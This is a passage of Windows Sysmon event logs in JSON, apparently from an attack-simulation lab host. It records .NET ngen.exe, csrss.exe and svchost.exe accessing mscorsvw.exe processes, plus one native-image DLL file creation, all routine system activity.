C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:10.553","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-228F-5F25-0000-001076560F00}","TargetProcessId":"1464","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8180,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:10.553\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-228F-5F25-0000-001076560F00}\r\nTargetProcessId: 1464\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:10.553","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-228F-5F25-0000-001076560F00}","TargetProcessId":"1464","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8181,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:10.553\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-228F-5F25-0000-001076560F00}\r\nTargetProcessId: 1464\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:10.553","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-228F-5F25-0000-001076560F00}","TargetProcessId":"1464","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8182,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:10.615\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-22AE-5F25-0000-0010CB8E1000}\r\nTargetProcessId: 1232\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:10.615","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-22AE-5F25-0000-0010CB8E1000}","TargetProcessId":"1232","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8183,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:10.615\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-22AE-5F25-0000-0010CB8E1000}\r\nTargetProcessId: 1232\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:10.615","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-22AE-5F25-0000-0010CB8E1000}","TargetProcessId":"1232","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8184,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:10.631\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-22AE-5F25-0000-0010CB8E1000}\r\nTargetProcessId: 1232\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:10.631","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-22AE-5F25-0000-0010CB8E1000}","TargetProcessId":"1232","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8185,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:07:10.647\r\nProcessGuid: {41C8662E-22AE-5F25-0000-0010CB8E1000}\r\nProcessId: 1232\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\4d0-0\\System.Web.Routing.dll\r\nCreationUtcTime: 2020-08-01 08:07:10.647","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:07:10.647","ProcessGuid":"{41C8662E-22AE-5F25-0000-0010CB8E1000}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\4d0-0\\System.Web.Routing.dll","CreationUtcTime":"2020-08-01 08:07:10.647","EventReceivedTime":"2020-08-01 08:07:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8186,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:10.678\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-22AE-5F25-0000-001017921000}\r\nTargetProcessId: 4356\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:10.678","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-22AE-5F25-0000-001017921000}","TargetProcessId":"4356","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8187,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:10.678\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-22AE-5F25-0000-001017921000}\r\nTargetProcessId: 4356\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:10.678","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-22AE-5F25-0000-001017921000}","TargetProcessId":"4356","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
